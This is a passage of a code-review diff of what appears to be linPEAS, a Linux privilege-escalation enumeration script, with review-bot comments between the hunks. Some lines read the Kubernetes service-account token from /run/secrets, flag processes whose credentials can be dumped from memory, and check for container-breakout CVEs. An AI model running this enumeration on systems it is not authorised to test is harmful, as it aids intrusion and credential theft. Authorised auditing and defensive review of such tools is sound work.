(dmesg 2>/dev/null | grep "signature") || echo_not_found echo 
"" #-- SY) AppArmor - printf $Y"[+] "$GREEN"AppArmor enabled? .............. "$NC + print_2title "Linux Protections" + print_list "AppArmor enabled? .............. "$NC if [ `command -v aa-status 2>/dev/null` ]; then - aa-status 2>&1 | sed "s,disabled,${C}[1;31m&${C}[0m," + aa-status 2>&1 | sed "s,disabled,${SED_RED}," elif [ `command -v apparmor_status 2>/dev/null` ]; then - apparmor_status 2>&1 | sed "s,disabled,${C}[1;31m&${C}[0m," + apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then ls -d /etc/apparmor* else 
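Review bot: The `grep -v "RELEVANT*|FIND*|…"` filter on the new Environment line uses `|` alternation without `-E`, and in basic regex syntax `|` is a literal character, so the exclusion list almost certainly filters nothing and every shell variable is printed whenever `set` is the fallback for `env`. The list also predates this commit's new colour and storage variables (`YELLOW`, `BLUE`, `SED_RED`, `SED_RED_YELLOW`, `SED_GREEN`, `SED_BLUE`, `PSTORAGE_*`), so even with `-E` they would appear in the dump; `grep -Ev "…|^YELLOW=|^BLUE=|^SED_|^PSTORAGE_"` covers both. Separately, `print_2title "Searching Signature verification failed in dmseg"` should read `dmesg`.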
@@ -1184,37 +1267,37 @@ if [ "`echo $CHECKS | grep SysI`" ]; then fi #-- SY) grsecurity - printf $Y"[+] "$GREEN"grsecurity present? ............ "$NC + print_list "grsecurity present? ............ "$NC ((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") #-- SY) PaX - printf $Y"[+] "$GREEN"PaX bins present? .............. "$NC - (which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") + print_list "PaX bins present? .............. "$NC + (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") #-- SY) Execshield - printf $Y"[+] "$GREEN"Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${C}[1;31m&${C}[0m," + print_list "Execshield enabled? ............ "$NC + (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," #-- SY) SElinux - printf $Y"[+] "$GREEN"SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${C}[1;31m&${C}[0m," + print_list "SELinux enabled? ............... "$NC + (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," #-- SY) ASLR - printf $Y"[+] "$GREEN"Is ASLR enabled? ............... "$NC + print_list "Is ASLR enabled? ............... "$NC ASLR=`cat /proc/sys/kernel/randomize_va_space 2>/dev/null` - if [ -z "$ASLR" ]; then - echo_not_found "/proc/sys/kernel/randomize_va_space"; + if [ -z "$ASLR" ]; then + echo_not_found "/proc/sys/kernel/randomize_va_space"; else if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi echo "" fi #-- SY) Printer - printf $Y"[+] "$GREEN"Printer? ....................... "$NC + print_list "Printer? ....................... 
"$NC lpstat -a 2>/dev/null || echo_not_found "lpstat" - + #-- SY) Running in a virtual environment - printf $Y"[+] "$GREEN"Is this a virtual machine? ..... "$NC + print_list "Is this a virtual machine? ..... "$NC hypervisorflag=`cat /proc/cpuinfo 2>/dev/null | grep flags | grep hypervisor` if [ `command -v systemd-detect-virt 2>/dev/null` ]; then detectedvirt=`systemd-detect-virt` 
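Review bot: `command -v paxctl-ng paxctl` answers "Yes" only when `paxctl-ng` resolves: bash's `command -v` returns non-zero when any operand is missing, and dash (`/bin/sh` on Debian-family hosts) looks up only the first operand and ignores the rest, so a host with just `paxctl` installed is reported as having no PaX. `(command -v paxctl-ng >/dev/null 2>&1 || command -v paxctl >/dev/null 2>&1) && echo "Yes" || echo_not_found "PaX"` asks the intended question in both shells. The same multi-operand form appears in the Containers hunk (`command -v $CONTAINER_CMDS`) and the Available Software hunk (`command -v $CONTAINER_CMDS nmap aws …` and `command -v gcc g++ …`), where under dash only the first tool would be listed; one `command -v` per name, or a `for` loop over the names, keeps the listing `which` produced. The shell the script actually runs under is not visible in this hunk, so the dash behaviour is the part to confirm.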
@@ -1232,86 +1315,92 @@ if [ "`echo $CHECKS | grep Container`" ]; then ############################################## #---------------) Containers (---------------# ############################################## - printf $B"═════════════════════════════════════════╣ "$GREEN"Containers"$B" ╠══════════════════════════════════════════\n"$NC + print_title "Containers" containerCheck - printf $Y"[+] "$GREEN"Is this a container? ...........$NC $containerType\n" - - printf $Y"[+] "$GREEN"Container related tools present\n"$NC - which $CONTAINER_CMDS - printf $Y"[+] "$GREEN"Any running containers? ........ "$NC + print_2title "Container related tools present" + command -v $CONTAINER_CMDS + + print_2title "Container details" + print_list "Is this a container? ...........$NC $containerType" + + print_list "Any running containers? ........ "$NC # Get counts of running containers for each platform dockercontainers=`docker ps --format "{{.Names}}" 2>/dev/null | wc -l` + podmancontainers=`podman ps --format "{{.Names}}" 2>/dev/null | wc -l` lxccontainers=`lxc list -c n --format csv 2>/dev/null | wc -l` rktcontainers=`rkt list 2>/dev/null | tail -n +2 | wc -l` - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ]; then + if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then echo_no else containerCounts="" if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi + if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," # List 
any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi + if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi + if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi fi - + #If docker if [ "`echo \"$containerType\" | grep -i \"docker\"`" ]; then + print_2title "Docker Container details" inDockerGroup - printf $Y"[+] "$GREEN"Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${C}[1;31;103m&${C}[0m," - printf $Y"[+] "$GREEN"Looking and enumerating Docker Sockets\n"$NC + print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Looking and enumerating Docker Sockets\n"$NC enumerateDockerSockets - printf $Y"[+] "$GREEN"Docker version .................$NC$dockerVersion" + print_list "Docker version .................$NC$dockerVersion" checkDockerVersionExploits - printf $Y"[+] "$GREEN"Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${C}[1;31;103m&${C}[0m," - printf $Y"[+] "$GREEN"Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${C}[1;31;103m&${C}[0m," + 
print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," if [ "$inContainer" ]; then checkDockerRootless - printf $Y"[+] "$GREEN"Rooless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${C}[1;31m&${C}[0m," | sed -${E} "s,Yes,${C}[1;32m&${C}[0m," + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," fi fi if [ "$inContainer" ]; then echo "" - printf $Y"[+] "$GREEN"Container & breakout enumeration\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout\n"$NC - printf $Y"[+] "$GREEN"Container ID ...................$NC `cat /etc/hostname`\n" + print_2title "Container & breakout enumeration" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" + print_list "Container ID ...................$NC" `cat /etc/hostname` if [ "`echo \"$containerType\" | grep -i \"docker\"`" ]; then - printf $Y"[+] "$GREEN"Container Full ID ..............$NC `basename \"$(cat /proc/1/cpuset)\"`\n" + print_list "Container Full ID ..............$NC `basename \"$(cat /proc/1/cpuset)\"`\n" fi if [ "`echo \"$containerType\" | grep -i \"kubernetes\"`" ]; then - printf $Y"[+] "$GREEN"Kubernetes namespace ...........$NC `cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null`\n" - printf $Y"[+] "$GREEN"Kubernetes token ...............$NC `cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null`\n" + print_list "Kubernetes namespace ...........$NC `cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null`\n" + print_list "Kubernetes token ...............$NC `cat 
/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null`\n" fi checkContainerExploits - printf $Y"[+] "$GREEN"Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${C}[1;31;103m&${C}[0m," + print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," echo "" - printf $Y"[+] "$GREEN"Container Capabilities\n"$NC - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${C}[1;31m&${C}[0m,g" + print_2title "Container Capabilities" + capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" echo "" - printf $Y"[+] "$GREEN"Privilege Mode\n"$NC + print_2title "Privilege Mode" if [ -x "$(command -v fdisk)" ]; then if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${C}[1;31;103m&${C}[0m," + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${C}[1;32m&${C}[0m," + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," fi else echo_not_found fi echo "" - printf $Y"[+] "$GREEN"Interesting Files Mounted\n"$NC + print_2title "Interesting Files Mounted" grep -Ev "$GREP_IGNORE_MOUNTS" /proc/self/mountinfo | cut -d' ' -f 4- echo "" - printf $Y"[+] "$GREEN"Possible Entrypoints\n"$NC + print_2title "Possible Entrypoints" ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq echo "" fi 
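Review bot: `print_list "Container ID ...................$NC" `cat /etc/hostname`` now passes the hostname as a second argument, while the neighbouring Container Full ID and Kubernetes lines keep the value inside the single string; unless `print_list` prints every argument (its definition is outside this hunk), the ID is silently dropped, and either way the two forms should be unified, e.g. `print_list "Container ID ...................$NC `cat /etc/hostname`\n"`. The Kubernetes token line writes the complete service-account bearer token into the report; because this output is routinely saved to disk and shared, printing only that the token exists, or a short prefix via `| cut -c1-12`, keeps the finding without turning the report itself into a credential store. `podman ps` is added to the running-container count, but `$CONTAINER_CMDS` is defined outside the hunk, so I cannot confirm podman is also part of the tools listing above it.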
@@ -1326,18 +1415,18 @@ if [ "`echo $CHECKS | grep Devs`" ]; then ########################################### #---------------) Devices (---------------# ########################################### - printf $B"═════════════════════════════════════════╣ "$GREEN"Devices"$B" ╠══════════════════════════════════════════\n"$NC + print_title "Devices" #-- 1D) sd in /dev - printf $Y"[+] "$GREEN"Any sd*/disk* disk in /dev? (limit 20)\n"$NC - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${C}[1;31m&${C}[0m," | head -n 20 + print_2title "Any sd*/disk* disk in /dev? (limit 20)" + ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 echo "" #-- 2D) Unmounted - printf $Y"[+] "$GREEN"Unmounted file-system?\n"$NC - printf $B"[i] "$Y"Check if you can mount umounted devices\n"$NC + print_2title "Unmounted file-system?" + print_info "Check if you can mount umounted devices" if [ -f "/etc/fstab" ]; then - cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$notmounted,${C}[1;31m&${C}[0m," | sed -${E} "s,$mounted,${C}[1;34m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m," | sed -${E} "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$mountpermsG,${C}[1;32m&${C}[0m,g" + cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" else echo_not_found "/etc/fstab" fi 
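Review bot: `print_info "Check if you can mount umounted devices"` should read `unmounted`. On the rewritten fstab line, `grep -v "^#"` immediately followed by `grep -Ev "\W+\#|^#"` is redundant, since the second pattern already excludes `^#`; keeping only `grep -Ev "\W+\#|^#"` gives the same filtering with one process fewer. Style only, output unchanged.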
@@ -1351,16 +1440,16 @@ if [ "`echo $CHECKS | grep AvaSof`" ]; then ########################################### #---------) Available Software (----------# ########################################### - printf $B"════════════════════════════════════╣ "$GREEN"Available Software"$B" ╠════════════════════════════════════\n"$NC + print_title "Available Software" #-- 1AS) Useful software - printf $Y"[+] "$GREEN"Useful software\n"$NC - which $CONTAINER_CMDS nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr 2>/dev/null + print_2title "Useful software" + command -v $CONTAINER_CMDS nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr 2>/dev/null echo "" #-- 2AS) Search for compilers - printf $Y"[+] "$GREEN"Installed Compiler\n"$NC - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); + print_2title "Installed Compiler" + (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 
@@ -1371,26 +1460,26 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #################################################### #-----) Processes & Cron & Services & Timers (-----# #################################################### - printf $B"══════════════════════════════╣ "$GREEN"Processes, Cron, Services, Timers & Sockets"$B" ╠════════════════════════════════\n"$NC + print_title "Processes, Cron, Services, Timers & Sockets" #-- PCS) Cleaned proccesses - printf $Y"[+] "$GREEN"Cleaned processes\n"$NC + print_2title "Cleaned processes" if [ "$NOUSEPS" ]; then - printf $B"[i] "$GREEN"Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC + printf ${BLUE}"[i] "$GREEN"Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC fi - printf $B"[i] "$Y"Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes\n"$NC + print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesDump,${C}[1;31m&${C}[0m," + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} 
"s,$processesDump,${SED_RED}," pslist=`print_ps` else (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesDump,${C}[1;31m&${C}[0m," + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," if [ "`command -v capsh`" ] && ! [ "`echo \"$psline\" | grep root`" ]; then cpid="`echo \"$psline\" | awk '{print $2}'`" caphex=0x"`cat \"/proc/$cpid/status\" 2> /dev/null | grep \"CapEff\" | awk '{print $2}'`" if [ "$caphex" ] && [ "$caphex" != "0x" ] && [ "`echo \"$caphex\" | grep -v '0x0000000000000000'`" ]; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | sed -${E} "s,$capsB,${C}[1;31m&${C}[0m,g" + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | sed -${E} "s,$capsB,${SED_RED},g" fi fi done 
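Review bot: The `printf ${BLUE}"[i] "$GREEN"Looks like ps is not finding processes…"` line is the one message in this hunk left on raw `printf` while its siblings move to `print_info`/`print_2title`, and `${BLUE}` sits unquoted in the format argument; `print_info "Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes"` would match the rest, though `print_info` may colour it differently from the `$GREEN` used here. The per-process `while read psline` loop still pipes every line through ten `sed` processes, and `read` without `-r` mangles backslashes in a command line before highlighting; both pre-date this commit, but since the hunk rewrites that `sed` chain, collapsing it into one `sed` with several `-e` expressions and using `while read -r psline; do` would be cheap here.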
@@ -1398,193 +1487,189 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then echo "" #-- PCS) Binary processes permissions - printf $Y"[+] "$GREEN"Binary processes permissions\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes\n"$NC + print_2title "Binary processes permissions" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" binW="IniTialiZZinnggg" ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do if [ -w "$bpath" ]; then binW="$binW|$bpath" fi done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$binW,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;32m&${C}[0m," + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," fi echo "" #-- PCS) Files opened by processes belonging to other users if ! 
[ "$IAMROOT" ]; then - printf $Y"[+] "$GREEN"Files opened by processes belonging to other users\n"$NC - printf $B"[i] "$Y"This is usually empty because of the lack of privileges to read other user processes information\n"$NC - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," echo "" fi - #-- PCS) Processes with credentials inside memory - printf $Y"[+] "$GREEN"Processes with credentials in memory (root req)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory\n"$NC - if [ "`echo \"$pslist\" | grep \"gdm-password\"`" ]; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${C}[1;31m&${C}[0m,"; else echo_not_found "gdm-password"; fi - if [ "`echo \"$pslist\" | grep \"gnome-keyring-daemon\"`" ]; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${C}[1;31m&${C}[0m,"; else echo_not_found "gnome-keyring-daemon"; fi - if [ "`echo \"$pslist\" | grep \"lightdm\"`" ]; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${C}[1;31m&${C}[0m,"; else echo_not_found "lightdm"; fi - if [ "`echo \"$pslist\" | grep \"vsftpd\"`" ]; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${C}[1;31m&${C}[0m,"; else echo_not_found "vsftpd"; fi - if [ "`echo \"$pslist\" | grep \"apache2\"`" ]; 
then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${C}[1;31m&${C}[0m,"; else echo_not_found "apache2"; fi - if [ "`echo \"$pslist\" | grep \"sshd:\"`" ]; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${C}[1;31m&${C}[0m,"; else echo_not_found "sshd"; fi + #-- PCS) Processes with credentials inside memory + print_2title "Processes with credentials in memory (root req)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" + if [ "`echo \"$pslist\" | grep \"gdm-password\"`" ]; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi + if [ "`echo \"$pslist\" | grep \"gnome-keyring-daemon\"`" ]; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi + if [ "`echo \"$pslist\" | grep \"lightdm\"`" ]; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi + if [ "`echo \"$pslist\" | grep \"vsftpd\"`" ]; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi + if [ "`echo \"$pslist\" | grep \"apache2\"`" ]; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi + if [ "`echo \"$pslist\" | grep \"sshd:\"`" ]; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi echo "" #-- PCS) Different processes 1 min if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ]; then - printf $Y"[+] "$GREEN"Different processes executed during 1 min (interesting is low number of repetitions)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs\n"$NC + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" if [ "`ps -e -o command 2>/dev/null`" ]; then for i in $(seq 1 1250); do ps -e -o command >> $file.tmp1 2>/dev/null; sleep 0.05; done; sort $file.tmp1 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm $file.tmp1; fi echo "" fi #-- PCS) Cron - printf $Y"[+] "$GREEN"Cron jobs\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs\n"$NC + print_2title "Cron jobs" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," command -v incrontab 2>/dev/null || echo_not_found "incrontab" incrontab -l 2>/dev/null - ls -al /etc/cron* 2>/dev/null | sed -${E} "s,$cronjobsG,${C}[1;32m&${C}[0m,g" | sed "s,$cronjobsB,${C}[1;31m&${C}[0m,g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs /var/spool/cron/crontabs/* /var/spool/anacron /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts 
